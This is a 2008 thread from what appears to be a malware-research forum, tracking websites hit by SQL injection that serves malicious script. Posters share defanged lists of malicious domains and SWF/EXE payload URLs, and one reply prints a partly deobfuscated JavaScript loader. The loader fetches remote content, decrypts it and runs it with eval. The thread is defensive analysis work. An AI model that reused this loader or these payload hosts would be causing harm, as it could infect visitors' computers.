Author Topic: SQL Injected jscript sites  (Read 70244 times)

0 Members and 1 Guest are viewing this topic.

June 04, 2008, 03:02:21 pm
Reply #15

YanceySlide

  • Jr. Member

  • Offline
  • **

  • 31
    • The Shadowserver Foundation
Added:
hxxp://www.win496.com
hxxp://flyzhu.9966.org
hxxp://www.encode72.com
hxxp://www.exec51.com
The Shadowserver Foundation

June 04, 2008, 04:00:42 pm
Reply #16

sowhat-x

  • Guest
Quote
hxxp://fourevent.cn/16.swf
It's the same lamer we've already seen before...
Quote
hxxp://user1.12-27.net/bak.css

June 04, 2008, 04:25:33 pm
Reply #17

sowhat-x

  • Guest
Many swf-infected sites listed here as well...
(JohnC,here comes some extra work,lol!  :D )
http://ilion.blog47.fc2.com/blog-entry-46.html
http://ilion.blog47.fc2.com/blog-entry-47.html

June 04, 2008, 11:21:01 pm
Reply #18

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964

June 05, 2008, 02:08:01 pm
Reply #19

YanceySlide

  • Jr. Member

  • Offline
  • **

  • 31
    • The Shadowserver Foundation
We're having some issues with our webserver at the moment, so these haven't been posted to the blog entry.

New:
hxxp://www.tag58.com
hxxp://www.sslput4.com (it's now being injected)
hxxp://www.sslnet72.com
The Shadowserver Foundation

June 05, 2008, 02:27:21 pm
Reply #20

sowhat-x

  • Guest
Quote
We're having some issues with our webserver at the moment...
Tried a couple of hours ago and site wasn't accessible...but it seems like it's fixed now  :)

June 05, 2008, 03:41:57 pm
Reply #21

sowhat-x

  • Guest
From Ilion's blog above...
Quote
hxxp://exe.wokaixin.com/exe/115.swf
hxxp://exe.wokaixin.com/exe/16.swf
hxxp://exe.wokaixin.com/exe/28.swf
hxxp://exe.wokaixin.com/exe/45.swf
hxxp://exe.wokaixin.com/exe/47.swf
hxxp://exe.wokaixin.com/exe/64.swf
hxxp://fourevent.cn/115.swf
hxxp://fourevent.cn/16.swf
hxxp://fourevent.cn/28.swf
hxxp://fourevent.cn/45.swf
hxxp://fourevent.cn/47.swf
hxxp://fourevent.cn/64.swf
hxxp://iphone003.com/swf/115.swf
hxxp://iphone003.com/swf/16.swf
hxxp://iphone003.com/swf/28.swf
hxxp://iphone003.com/swf/45.swf
hxxp://iphone003.com/swf/47.swf
hxxp://iphone003.com/swf/64.swf
hxxp://mmlan.com.cn/4561.swf
hxxp://mmlan.com.cn/4562.swf
hxxp://mmlan.com.cn/mm.exe
hxxp://mmpp.cqcx321.cn/ff.swf
hxxp://mmpp.cqcx321.cn/ie.swf
hxxp://soft666666.cn/115.swf
hxxp://soft666666.cn/16.swf
hxxp://soft666666.cn/28.swf
hxxp://soft666666.cn/45.swf
hxxp://soft666666.cn/47.swf
hxxp://soft666666.cn/64.swf
hxxp://www.abc998801.cn/web/1.swf
hxxp://www.abc998801.cn/web/2.swf
hxxp://www.h-nan.net.cn/f115.swf
hxxp://www.h-nan.net.cn/f16.swf
hxxp://www.h-nan.net.cn/f28.swf
hxxp://www.h-nan.net.cn/f45.swf
hxxp://www.h-nan.net.cn/f47.swf
hxxp://www.h-nan.net.cn/i115.swf
hxxp://www.h-nan.net.cn/i16.swf
hxxp://www.h-nan.net.cn/i28.swf
hxxp://www.h-nan.net.cn/i45.swf
hxxp://www.h-nan.net.cn/i64.swf
hxxp://www.live322.cn/4561.swf
hxxp://www.live322.cn/4562.swf
hxxp://www.mvoe.cn/all/xmsl3.swf
hxxp://www.mvoe.cn/all/xmsl4.swf

June 05, 2008, 07:05:38 pm
Reply #22

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964
Ref: mgfcompressors.com

Quote
thanks Steven,
we have deleted the files and asked again our client to move to another
platform for his web portal.

Feel free to send again mail if it happens again.
Regards
Bybit staff

There is something on the server which inserts a malicious script into the homepage on the first time you view it, as Bobby stated. And it seems like the same type of script which you saw inserted in /portal/help/.

Since you have spoken with them before and they said feel free to mail them if it happens again, what do you think the chances are of them taking a little look on the server and giving us the script which is causing this. I would be interested to see it.

June 05, 2008, 08:02:31 pm
Reply #23

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
I'll get in touch and find out :)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

June 05, 2008, 11:58:28 pm
Reply #24

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
@Bobby,
I've got it decoded as far as the following, adding the vars as the errors borked on them, but it's now borking with an error telling me arguments.callee.toString() is null or not an object?

Code: [Select]
var FuqV=75397;
 var Z2Yh=73665;
 var xC=71163;
 var EjFO='KCUeqAKC32KCUeq9KC68KC3Vn0KCUeqAKC32KCUeq9KC68KC2BKC46KC7UeqKC71KCUeq6KC3BKCUeqAKC32KCUeq9KC68KC3Vn0KCUeqAKC32KCUeq9KC68KC2AKC78KC43KC3BKC76KC61KC72KC20KC6EKC4CKC6UeqKC6AKC3BKC6EKC4CKC6UeqKC6AKC3Vn0KC78KC43KC3BKC76KC61KC72KC20KC76KC76KC3Vn0KC32KC3UeqKC37KC31KC30KC3BKC6EKC4CKC6UeqKC6AKC3Vn0KC6EKC4CKC6UeqKC6AKC2AKC3UeqKC37KC37KC32KC3UeqKC3BKC76KC61KC72KC20KC4BKC4CKC3Vn0KC33KC30KC39KC3UeqKC32KC3B';
 eval(unescape(EjFO.replace(/Ueq/g,'5').replace(/KC/g,'%').replace(/Vn0/g,'D')));
 FuqV=FuqV+44051;
 
 var KL, vv, rz1, pv6x, nLej, xC, Mkmo='Fpo76Fpo61Fpo72Fpo20Fpo72Fpo7AFpo31Fpo3DFpo33Fpo30Fpo33Fpo34Fpo36Fpo3BFpo46Fpo75Fpo71Fpo56Fpo2DFpo2DFpo3BFpo76Fpo61Fpo72Fpo20Fpo44Fpo3DFpo27Fpo33Fpo35Fpo27Fpo3BFpo44Fpo3DFpo44Fpo2BFpo4BFpo4CFpo3B';
 eval(unescape(Mkmo.replace(/Fpo/g,'%')));
 Z2Yh=Z2Yh%KL;
 var Pv6c=80606;
 vv=vv+33901;
 var xEx=18390;
 var D;
 Pv6c=(Pv6c-79890)*(nLej-4095588384);
 FuqV=FuqV%Z2Yh;
 nLej=rz1+D;
 nLej=nLej+xEx;
 xC=(Pv6c-8575844471)*(vv-59581);
 D=xC%nLej;
 var Z3p='0dSmi460dSmi750dSmi710dSmi560dSmi3D0dSmi460dSmi750dSmi710dSmi560dSmixigY50dSmi440dSmi3B0dSmi760dSmi610dSmi7xigY0dSmixigY00dSmi650dSmi640dSmi6A0dSmi760dSmi3D0dSmi410dSmi480dSmi3B';
 eval(unescape(Z3p.replace(/ig/g,'z').replace(/0dS/g,'N').replace(/xzY/g,'2').replace(/Nmi/g,'%')));
 CvQ=new Array();
 var UEma;
 var mi;
 for(UEma=0;
 UEma<256;
 UEma++)
 {
   CvQ[UEma]=UEma;
 }
 mi=arguments.callee.toString();
 mi=mi.replace(/\W/g,'');
 mi=mi.toUpperCase();
 mi+=FuqV;
 var z2lP='cqe7ElcqeEl1cqe72cqe2Vcqe53cqe59cqeEl1cqe5cqeJ3DcqeEl5cqeEl4cqeElfcqe7Elcqe3Bcqe7ElcqeEl1cqe72cqe2Vcqe54cqe7cqeJEl3cqe3Dcqe27cqe27cqe3Bcqe7ElcqeEl1cqe72cqe2Vcqe75cqe41cqe3Dcqe31cqe3cqeJ33cqe3B';
 eval(unescape(z2lP.replace(/f/g,'A').replace(/V/g,'0').replace(/El/g,'6').replace(/cqe/g,'%').replace(/%J/g,'8%')));
 var oGZI;
 for(oGZI=0;
 oGZI<mi.length;
 oGZI++)
 {
   uA^=mi.charCodeAt(oGZI);
   if(oGZI%76==75)
   {
     Txc+=String.fromCharCode(uA);
     uA=183;
   }
   
 }
 if(oGZI%76!=75)
 {
   Txc+=String.fromCharCode(uA);
 }
 mi=Txc;
 var YL=null;
 var Cpw='%4D%73%78%6D%6C%32%2E%58%4D%4C%48%54%54%50';
 var it='%4D%69%63%72%6F%73%6F%66%74%2E%58%4D%4C%48%54%54%50';
 if (!YL)
 {
   try
   {
     YL=new XMLHttpRequest();
   }
   catch(e)
   {
     YL=null
   }
   ;
 }
 var ejA=unescape(Cpw);
 if (!YL)
 {
   try
   {
     YL=new ActiveXObject(ejA);
   }
   catch(e)
   {
     YL=null
   }
   
 }
 var zzl=unescape(it);
 if (!YL)
 {
   try
   {
     YL=new
     
     ActiveXObject(zzl);
   }
   catch(e)
   {
     YL=null
   }
   
 }
 var IOom=SYaX;
 var YH=function()
 {
   Oy = unescape(YL.responseText);
   var XT=0;
   var ZHev;
   for(Go=0;
   Go<256;
   Go++)
   {
     ZHev=Go%mi.length;
     ZHev=mi.charCodeAt(ZHev);
     var U;
U='9A%g148%g165%g176%g13D%g143%g176919B%g147%g16F9D%g12B9A%g148%g165%g176%g13B9A%g148%g165%g176%g13D9894%g12B9A%g148%g165%g176%g13B9894%g13D9A%g148%g165%g176%g120%g125%g120%g132%g135%g136%g13B9A%g148%g165%g176%g13D%g143%g176919B%g147%g16F9D%g13B%g143%g176919B%g147%g16F9D%g13D%g143%g176919B98949D%g13B%g143%g176919B98949D%g13D9A%g148%g165%g176%g13B';
     eval(unescape(U.replace(/%g/g,'M').replace(/M1/g,'%').replace(/9/g,'%5')));
   }
   qIpP=0;
   var BUBC;
   
   BUBC='daR45daR50daR45daR3DdaR30daR3BdaR76daR6B%daR72daR20daR7B%daR3DdaR27daR27daR3B';
   eval(unescape(BUBC.replace(/aR/g,'J').replace(/B%/g,'1').replace(/dJ/g,'%')));
   var RbLR;
   var RmmL;
   for(RbLR=0;
   RbLR<Oy.length;
   RbLR++)
   {
     qIpP=qIpP+1;
     var De;
De='G8N1G849G8N0G850G83DG8N1G849G8N0G850G825G832G835G836G83BG845G850G845G83DG845G850G845G82BG843G8N6G851G85BG8N1G849G8N0G850G85DG83BG845G850G845G83DG845G850G845G825G832G835G836G83BG85AG848G865G8N6G83DG843G8N6G851G85BG8N1G849G8N0G850G85DG83BG843G8N6G851G85BG8N1G849G8N0G850G85DG83DG843G8N6G851G85BG845G850G845G85DG83BG843G8N6G851G85BG845G850G845G85DG83DG85AG848G865G8N6G83BG852G86DG86DG84CG83DG843G8N6G851G85BG8N1G849G8N0G850G85DG82BG843G8N6G851G85BG845G850G845G85DG83BG852G86DG86DG84CG83DG852G86DG86DG84CG825G832G835G836G83BG852G86DG86DG84CG83DG843G8N6G851G85BG852G86DG86DG84CG85DG83BG852G86DG86DG84CG83DG84FG8N9G82EG863G868G861G8N2G843G86FG864G865G841G8N4G828G852G862G84CG852G829G85EG852G86DG86DG84CG83BG8N1G82BG83DG853G8N4G8N2G869G86EG86NG82EG866G8N2G86FG86DG843G868G861G8N2G843G86FG864G865G828G852G86DG86DG84CG829G83B';
     eval(unescape(De.replace(/N/g,'7').replace(/G8/g,'%')
     ));
   }
   eval(q);
 }
 ;var
 
 G=function()
 {
   if((YL.readyState==4)&&(YL.status==200))
   {
     YH();
   }
   
 }
 ;//YL.onreadystatechange=G;
 YL.open('GET',IOom,true);
 YL.send(null);

I added // before YL.onready.... just so it would go through with my manual script :) (manual script just over-rides document.write and eval so it dumps it to a file instead)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

June 05, 2008, 11:59:32 pm
Reply #25

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Btw, AntiVir is detecting my amended version as HTML/Crypted.Gen ...... which is a bit wierd as it completely ignored it prior to my modifying the script to correct the errors thrown by it ..
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

June 06, 2008, 05:30:41 am
Reply #26

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
Antnet gave here a complete solution for deobfuscating this one:
http://malware-research.co.uk/index.php?topic=8164.0

June 06, 2008, 05:34:04 am
Reply #27

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

June 06, 2008, 01:53:45 pm
Reply #28

YanceySlide

  • Jr. Member

  • Offline
  • **

  • 31
    • The Shadowserver Foundation
New:
kk6.us
hxxp://www.siteid38.com
The Shadowserver Foundation

June 06, 2008, 05:10:57 pm
Reply #29

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964